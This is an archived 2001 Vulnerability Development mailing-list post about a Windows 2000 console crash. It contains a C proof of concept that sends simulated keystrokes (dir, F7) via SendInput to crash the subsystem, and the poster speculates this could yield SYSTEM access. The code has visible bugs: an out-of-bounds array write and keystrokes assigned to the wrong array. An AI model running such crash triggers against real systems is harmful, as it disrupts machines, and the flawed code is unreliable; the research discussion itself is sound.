Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: RE: bug w2k

RE: bug w2k

From: Vladimir Kraljevic <vladimir_kraljevic_at_llbudapest.hu>
Date: Wed, 1 Aug 2001 10:11:52 +0200

It works with the simulated keystrokes as well... I was able to track it
down up to the point where subsystem crashes, but I have no more time to
spend on it.

I was able to get access violation system box and delay the restart;
everyone with decent kernel debugger (SoftICE and kinds) can trace the exact
point of the crash. I'm pretty sure that you are getting system account. If
I'm right, we'll soon have nice exploit, usefull to anyone that has access
to the CLI.

Enough for now, some work will follow, have some ideas

Vladimir

P.S. You can repeat last two lines (SendInput(...))

=============================================================CUT HERE

#define _WIN32_WINNT 0x0401
#include <windows.h>
#include <winuser.h>
#include <winnt.h>

void main(int argc, char *argv[])
{
        //Simulate "dir\n"

        INPUT inDirStrokes[7];
        memset(inDirStrokes, 0, sizeof(inDirStrokes));

        inDirStrokes[0].type=INPUT_KEYBOARD;
        inDirStrokes[0].ki.dwFlags=0;
        inDirStrokes[0].ki.wVk=VkKeyScan('d');
        inDirStrokes[1].type=INPUT_KEYBOARD;
        inDirStrokes[1].ki.dwFlags=KEYEVENTF_KEYUP;
        inDirStrokes[1].ki.wVk=VkKeyScan('d');

        inDirStrokes[2].type=INPUT_KEYBOARD;
        inDirStrokes[2].ki.dwFlags=0;
        inDirStrokes[2].ki.wVk=VkKeyScan('i');
        inDirStrokes[3].type=INPUT_KEYBOARD;
        inDirStrokes[3].ki.dwFlags=KEYEVENTF_KEYUP;
        inDirStrokes[3].ki.wVk=VkKeyScan('i');

        inDirStrokes[4].type=INPUT_KEYBOARD;
        inDirStrokes[4].ki.dwFlags=0;
        inDirStrokes[4].ki.wVk=VkKeyScan('r');
        inDirStrokes[5].type=INPUT_KEYBOARD;
        inDirStrokes[5].ki.dwFlags=KEYEVENTF_KEYUP;
        inDirStrokes[5].ki.wVk=VkKeyScan('r');

        inDirStrokes[6].type=INPUT_KEYBOARD;
        inDirStrokes[6].ki.dwFlags=0;
        inDirStrokes[6].ki.wVk=VK_RETURN;
        inDirStrokes[7].type=INPUT_KEYBOARD;
        inDirStrokes[7].ki.dwFlags=KEYEVENTF_KEYUP;
        inDirStrokes[7].ki.wVk=VK_RETURN;

        //Simulate "<F7>\n"

        INPUT inF7Strokes[4];
        memset(inF7Strokes, 0, sizeof(inF7Strokes));

        inF7Strokes[0].type=INPUT_KEYBOARD;
        inF7Strokes[0].ki.dwFlags=0;
        inF7Strokes[0].ki.wVk=VK_F7;
        inF7Strokes[1].type=INPUT_KEYBOARD;
        inF7Strokes[1].ki.dwFlags=KEYEVENTF_KEYUP;
        inF7Strokes[1].ki.wVk=VK_F7;

        inDirStrokes[2].type=INPUT_KEYBOARD;
        inDirStrokes[2].ki.dwFlags=0;
        inDirStrokes[2].ki.wVk=VK_RETURN;
        inDirStrokes[3].type=INPUT_KEYBOARD;
        inDirStrokes[3].ki.dwFlags=KEYEVENTF_KEYUP;
        inDirStrokes[3].ki.wVk=VK_RETURN;

        SendInput(sizeof(inDirStrokes)/sizeof(inDirStrokes[0]), inDirStrokes,
sizeof(INPUT));
        SendInput(sizeof(inF7Strokes)/sizeof(inF7Strokes[0]), inF7Strokes,
sizeof(INPUT));
}

=============================================================CUT HERE
Received on Aug 01 2001

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos